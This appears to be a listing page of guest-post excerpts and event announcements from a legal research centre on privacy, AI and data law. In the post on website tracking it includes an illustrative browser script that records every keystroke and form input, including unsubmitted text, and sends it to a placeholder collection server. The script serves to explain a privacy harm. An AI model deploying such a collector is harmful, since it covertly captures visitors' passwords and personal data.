British government’s new ‘anti-fake news’ unit has been tried before – and it got out of hand


In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

 

Continue reading

Annual Conference 2017 Resources

The Information Law and Policy Centre held its third annual conference on 17 November 2017. The conference’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The conference brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill, which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Co-existing with HAL 9000: Being Human in a World with AI

This event will focus on the implications posed by the increasingly significant role of artificial intelligence (AI) in society and the possible ways in which humans will co-exist with AI in future, particularly the impact that this interaction will have on our liberty, privacy, and agency. Will the benefits of AI only be achieved at the expense of these human rights and values? Do current laws, ethics, or technologies offer any guidance with respect to how we should navigate this future society?

Event date:
Monday, 20 November 2017 – 5:30pm

Emotion detection, personalisation and autonomous decision-making online

This event took place at the Information Law and Policy Centre at the Institute of Advanced Legal Studies on Monday, 5 February 2018.

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants:

Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Hamed Haddadi, Senior Lecturer (Associate Professor), Deputy Director of Research in the Dyson School of Design Engineering, and an Academic Fellow of the Data Science Institute in the Faculty of Engineering, Imperial College London.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision-making. Technological advances are now rendering emotions detectable in real time. Building on the granular insights provided by big data, these developments allow commercial entities to move beyond targeting behaviour in advertisements to personalising services, interfaces and other consumer-facing interactions, based on the personal preferences, biases and emotional insights gleaned from the tracking and profiling of online activity and the emergence of ‘empathic media’.
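To make the loop from detected emotion to personalised response more concrete, the following is a purely illustrative sketch in TypeScript. Real ‘empathic media’ systems rely on trained models over text, voice or facial data rather than the toy keyword lexicon used here, and every name in the sketch is hypothetical.

```typescript
// Toy sketch: keyword-based emotion detection driving a personalised interface choice.
// Illustrative only; commercial systems use trained models over far richer signals.
const lexicon: Record<string, { emotion: string; weight: number }> = {
  angry: { emotion: "anger", weight: 1.0 },
  refund: { emotion: "anger", weight: 0.6 },
  love: { emotion: "joy", weight: 1.0 },
  thanks: { emotion: "joy", weight: 0.5 },
  worried: { emotion: "fear", weight: 0.8 },
};

// Score the text against the lexicon and return the highest-scoring emotion.
function detectEmotion(text: string): string {
  const scores: Record<string, number> = {};
  for (const word of text.toLowerCase().split(/\W+/)) {
    const hit = lexicon[word];
    if (hit) scores[hit.emotion] = (scores[hit.emotion] ?? 0) + hit.weight;
  }
  const best = Object.entries(scores).sort((a, b) => b[1] - a[1])[0];
  return best ? best[0] : "neutral";
}

// Personalisation step: the detected emotion selects which message the user sees.
function chooseBanner(text: string): string {
  switch (detectEmotion(text)) {
    case "anger": return "Talk to a human agent now";
    case "joy":   return "You might also like...";
    case "fear":  return "Here is our reassurance guide";
    default:      return "Welcome back";
  }
}

console.log(chooseBanner("I am angry and want a refund")); // "Talk to a human agent now"
```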

Continue reading

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Registration open

Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR


Speaker: Professor Irene Ng, Director of the International Institute for Product and Service Innovation and Professor of Marketing and Service Systems at WMG, University of Warwick

Panel Discussants: Perry Keller, King’s College London, and John Sheridan, The National Archives

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, Institute of Advanced Legal Studies

 

Description:

Despite the World Economic Forum (2011) report on personal data becoming an asset class, the cost of transacting on personal data is becoming increasingly high, given regulatory risks, societal disapproval, legal complexity and privacy concerns.

Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. Although personal data is a co-produced asset, the individual has not had the technological capability to control and process his or her own data, or indeed data in general. Hence, legal and economic structures have been created only around organisation-controlled personal data (OPD).

This presentation will argue that person-controlled personal data (PPD), architected technologically, legally and economically so that the individual owns a personal micro-server and therefore has full rights to the data within it, much like owning a PC or a smartphone, is potentially a route to reducing transaction costs and innovating in the personal data economy. Professor Ng will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).
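By way of illustration, here is a minimal conceptual sketch in TypeScript of the PPD idea described above: the data sits in a store the person controls, and it is the person, not the organisation, who issues and revokes access grants. This is not the HAT platform’s actual API; all types and method names are invented for the example.

```typescript
// Conceptual sketch of a person-controlled personal data (PPD) store.
// Hypothetical types and methods; not the HAT API.
interface Grant {
  grantee: string;   // e.g. "fitness-app.example"
  namespace: string; // e.g. "health/steps"
  expires: Date;
}

class PersonalDataStore {
  private data = new Map<string, unknown[]>(); // namespace -> records
  private grants: Grant[] = [];

  // Only the owner writes; the store runs on a micro-server the person controls.
  write(namespace: string, record: unknown): void {
    const records = this.data.get(namespace) ?? [];
    records.push(record);
    this.data.set(namespace, records);
  }

  // The owner decides who may read which namespace, and for how long.
  grantAccess(grantee: string, namespace: string, days: number): void {
    const expires = new Date(Date.now() + days * 24 * 60 * 60 * 1000);
    this.grants.push({ grantee, namespace, expires });
  }

  revokeAccess(grantee: string, namespace: string): void {
    this.grants = this.grants.filter(
      (g) => !(g.grantee === grantee && g.namespace === namespace)
    );
  }

  // A third party's read succeeds only while a matching, unexpired grant exists.
  read(grantee: string, namespace: string): unknown[] {
    const ok = this.grants.some(
      (g) => g.grantee === grantee && g.namespace === namespace && g.expires > new Date()
    );
    if (!ok) throw new Error("No valid grant for " + namespace);
    return this.data.get(namespace) ?? [];
  }
}

// Usage: the person writes data, grants a time-limited right to read it, then revokes it.
const store = new PersonalDataStore();
store.write("health/steps", { date: "2018-02-19", steps: 8500 });
store.grantAccess("fitness-app.example", "health/steps", 30);
console.log(store.read("fitness-app.example", "health/steps")); // allowed while the grant is live
store.revokeAccess("fitness-app.example", "health/steps");      // access ends immediately
```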

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng advises large organisations, startups and governments on the design of markets and on economic and business models in the digital economy. Her personal website is http://ireneng.com.

John Sheridan is the Digital Director at The National Archives, with overall responsibility for the organisation’s digital services and digital archiving capability. His role is to provide strategic direction, developing the people and capability needed for The National Archives to become a disruptive digital archive. John’s academic background is in mathematics and information technology, with a degree in Mathematics and Computer Science from the University of Southampton and a Master’s degree in Information Technology from the University of Liverpool. Prior to his current role, John was Head of Legislation Services at The National Archives, where he led the team responsible for creating legislation.gov.uk, as well as overseeing the operation of the official Gazette. John recently led, as Principal Investigator, an Arts and Humanities Research Council-funded project, ‘big data for law’, exploring the application of data analytics to the statute book, which won the Halsbury Legal Award for Innovation. John has a strong interest in web and data standards and is a former co-chair of the W3C e-Government Interest Group. He serves on the UK Government’s Data Leaders group and Open Standards Board, which sets data standards for use across government. John was an early pioneer of open data and remains active in that community.

Perry Keller is Reader in Media and Information Law at the Dickson Poon School of Law, King’s College London, where he teaches and researches issues relating to freedom of expression, privacy and data protection. He is the author of European and International Media Law. Mr Keller’s current research concerns the transparency of urban life as a consequence of governmental and commercial surveillance and the particular challenges that brings for liberal democracies. He also has longstanding connections with China, having previously studied or worked in Beijing, Nanjing, Taipei and Hong Kong. His current research interests regarding law and regulation in China concern the development of a divergent Chinese model for securing data privacy and security.

A wine reception will follow this seminar.


Admission FREE but advance booking is required.

 

AI trust and AI fears: A media debate that could divide society


In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford examines the key question of trust or fear of AI.

We are at the tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts, even when those experts are wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Continue reading

A Prediction about Predictions

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Continue reading

How websites watch your every move and ignore privacy settings


In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it is submitted and even if the form is later abandoned – according to the results of a study by researchers at Princeton University.

And there’s a nasty side-effect: personally identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.
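To illustrate the mechanism at issue, here is a deliberately simplified sketch (not code from the Princeton study) of how a third-party “session replay” script can capture what a visitor types and send it to a collection server before any form is submitted. The endpoint, event format and field names are hypothetical; the sketch is TypeScript for a browser context.

```typescript
// Illustrative sketch of a session-replay collector. Hypothetical endpoint and fields.
type ReplayEvent = {
  kind: "key" | "input";
  target: string;   // identifier of the element being typed into
  value?: string;   // raw text as typed, captured before any submission
  ts: number;
};

const buffer: ReplayEvent[] = [];

function record(event: ReplayEvent): void {
  buffer.push(event);
  if (buffer.length >= 50) flush();
}

function flush(): void {
  // Data leaves the page even if the form is never submitted or is later cleared.
  navigator.sendBeacon("https://collector.example.com/replay", JSON.stringify(buffer));
  buffer.length = 0;
}

// Nothing here consults navigator.doNotTrack; honouring that setting is left
// entirely to the script author, which is why it is so often ignored.
document.addEventListener("input", (e) => {
  const el = e.target as HTMLInputElement;
  record({ kind: "input", target: el.name || el.id, value: el.value, ts: Date.now() });
});

document.addEventListener("keydown", (e) =>
  record({ kind: "key", target: (e.target as HTMLElement).tagName, value: e.key, ts: Date.now() })
);

// Ship anything still buffered when the visitor leaves the page.
window.addEventListener("pagehide", flush);
```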

Continue reading

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

In this guest post, Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis of a new ECJ opinion. This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns the jurisdiction of courts over civil and commercial disputes. While this is an Advocate General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidate the Court’s prior broad interpretation of the Data Protection Directive. While this might be the headline, it is worth considering a perhaps overlooked element of the data economy: the role of the content provider in supplying the individuals whose data is harvested.

Continue reading